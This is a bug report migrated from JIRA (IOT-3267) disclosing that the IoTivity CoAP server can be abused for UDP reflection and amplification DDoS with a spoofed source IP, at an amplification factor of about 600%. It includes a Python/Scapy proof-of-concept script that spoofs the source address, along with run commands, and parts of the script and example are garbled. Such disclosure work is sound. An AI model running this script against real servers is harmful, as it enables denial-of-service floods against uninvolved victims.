Traffic amplification of UDP packets
IoTivity server in current version (HEAD-5349dadc taken from github) can be used to perform Distributed Denial of Service attacks acting as network amplifier with spoofing of the source IP address.
After receiving CoAP GET message (53 bytes long) IoTivity server responds with 6 CoAP packets (each 62 bytes long)
###[ CoAP ]###
ver = 1L
type = CON
tkl = 0L
code = 4.01 Unauthorized
msg_id = 1881
token = ''
options = [('Uri-Path', 'test')]
paymark = ''
Together all response packets are 372 bytes, which gives 600% amplification factor (calculated as: size_of_output/size_of_input - 1).
Server responds to IP address from first packet without getting any concurrent response from client, so this request can be used for Distributed Denial of Service with spoofing source IP address.
Issue was tested and was reproduced for following examples IoTivity server applications:
Issue can be reproduced using following Python2 script (requires Scapy library and sudo to spoof source IP address):
from scapy.all import *
IOTIVITY_PAYLOAD = "40010759b474657374"
data = IOTIVITY_PAYLOAD.decode('hex')
packet = IP(src=sys.argv, dst=sys.argv)/UDP(sport=int(sys.argv), dport=5683)/Raw(data)
sr(packet, timeout=5, multi=1)
Execution of the script:
sudo python iotivity_test.py src_ip src_port dst_ip
(where: src_ip and src_port are IP and port of spoofed source client
dst_ip is IP of tested IoTivity server on port 5683)
sudo python iotivity_test.py 220.127.116.11 50000 192.168.0.101
For IoTivity example application started with following command on server with IP=192.168.0.101:
CoAP responses will be sent to 18.104.22.168:50000.
JIRA migration meta data
- JIRA Issue ID: IOT-3267
- Reporter: cvereporting
- Assignee: avolkov
- Creator: cvereporting
- Created at: 2019-02-15T08:13:08.000-0800
- Found in Version: Current (HEAD-5349dadc)
- Fix in Version: None
- Issue Severity: Major
- Reproducibility: Always (100%)
- Operating System: None
- Hardware/ OEM Platform: None
- External URL: None
- Bugzilla ID: None
- Product: None
- Status: Reopened
- Components: Primitive Service
- Priority: P2
- Due Date: None
Issue Type: Bug
END of JIRA migration meta data